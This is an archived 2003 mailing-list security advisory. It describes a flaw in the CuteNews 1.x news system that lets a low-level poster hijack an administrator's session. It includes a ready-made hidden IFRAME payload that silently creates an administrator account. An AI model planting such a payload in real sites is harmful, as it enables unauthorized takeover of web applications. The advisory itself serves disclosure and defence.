[VulnWatch] Admin Account Creation Vulnerability in CuteNews 1.x

From: Peter Winter-Smith (peter4020_at_hotmail.com)
Date: 06/29/03

  • Next message: silentscripter: "[VulnWatch] Multiple vulnerabilities in paBox" 
    To: vulnwatch@vulnwatch.org, vuln@secunia.com, bugs@securitytracker.com
Date: Sun, 29 Jun 2003 09:04:58 +0000

    Admin Account Creation Vulnerability in CuteNews 1.x

    Url: http://www.cutephp.com

    CuteNews is an efficient, user-friendly and well designed news system
    which is both easy to set up, and doesn't even require SQL to function
    instead creating it's own databases.

    It supports multiple user levels, such as Journalist (3), Editor (2)
    and Admininistrator (1), and has taken precautions to ensure that
    field injection cannot alter the user level, by placing the user level
    at the start of the database, rather than after any given field.

    It does however allow the minor users to post HTML content in their
    posts, which could lead to cross site scripting cookie 'stealing',
    but luckily the creator has only stored MD5 hashes of the password,
    so that accounts cannot be directly stolen.

    It appears however that CuteNews does not filter urls relating to the
    site itself, or rather the CuteNews control panel.

    Therefore, if a user was to inject the correct commands into a news
    article in a hidden IFRAME, or some such control, then upon the
    administrator browing to the news page after having signed in to
    CuteNews the commands would be executed and the administrator would be
    none the wiser.

    Example:

    --------------------------------[Start Post]-------------------------------

    Blah, blah, welcome to site.com, etc.

    <iframe
    src="index.php?regusername=owned&regpassword=pass&regnickname=owned&regemail=none@none.com&reglevel=1&action=adduser&mod=editusers"
    height=0 width=0 frameborder=0 scrolling=0></iframe>
    ---------------------------------[End Post]--------------------------------

    If the above data was posted on the news page, the administrator accounts
    would be able to execute the command without any notification at all.

    That URL in particular adds an administrator account with the username
    'owned' and the password 'pass'.

    ================================================================

    Operating system and servicepack level:
    Any operating system.

    Software:
    CuteNews, PHP 4+

    Under what circumstances the vulnerability was discovered:
    Messing around with CuteNews

    If the vendor has been notified:
    Yes.

    How to contact you for further information:
    I can always be reached at peter4020@hotmail.com

    Please credit this find to:
    Peter Winter-Smith

    Thank you for your time,
    -Peter

    _________________________________________________________________
    Tired of 56k? Get a FREE BT Broadband connection
    http://www.msn.co.uk/specials/btbroadband

  • Next message: silentscripter: "[VulnWatch] Multiple vulnerabilities in paBox"